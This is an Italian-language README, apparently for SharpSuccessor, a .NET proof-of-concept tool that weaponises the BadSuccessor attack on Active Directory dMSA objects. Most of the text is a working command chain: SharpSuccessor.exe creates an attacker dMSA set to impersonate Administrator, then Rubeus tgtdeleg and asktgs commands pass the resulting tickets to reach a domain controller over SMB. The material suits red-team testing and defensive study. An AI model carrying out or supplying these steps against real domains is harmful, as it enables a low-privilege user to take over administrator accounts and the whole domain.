
SharpSuccessor è una Proof of Concept (POC) .NET per armare completamente l'attacco BadSuccessor di Yuval Gordon (@YuG0rd) di Akamai.
SharpSuccessor è un Proof of Concept (POC) .NET per armare completamente l'attacco BadSuccessor di Yuval Gordon (@YuG0rd) di Akamai. Un utente con bassi privilegi che dispone dei permessi CreateChild su qualsiasi Unità Organizzativa (OU) nel dominio Active Directory, con accesso in scrittura su un oggetto target, può eseguire l'account takeover.
Usa SharpSuccessor per aggiungere e armare l'oggetto dMSA, oltre a scrivere gli attributi corretti sull'account target che desideri impersonare:
SharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA

Richiedi un TGT con il contesto dell'utente corrente, in questo caso jdoe:
Rubeus.exe tgtdeleg /nowrap

Quindi usa quel tgt per impersonare l'account dMSA:
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIFTDCCB.....

Ora puoi richiedere un ticket di servizio con il contesto di Administrator per qualsiasi SPN, inclusi i Domain Controller per la post-esplorazione. Ad esempio, qui mostro i privilegi amministrativi per SMB sul domain controller:
Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...

Ora che abbiamo il ticket in memoria, possiamo testare l'accesso:

Un enorme ringraziamento a Jim Sykora e Garrett Foster per l'ispirazione e l'assistenza nella creazione di questo strumento!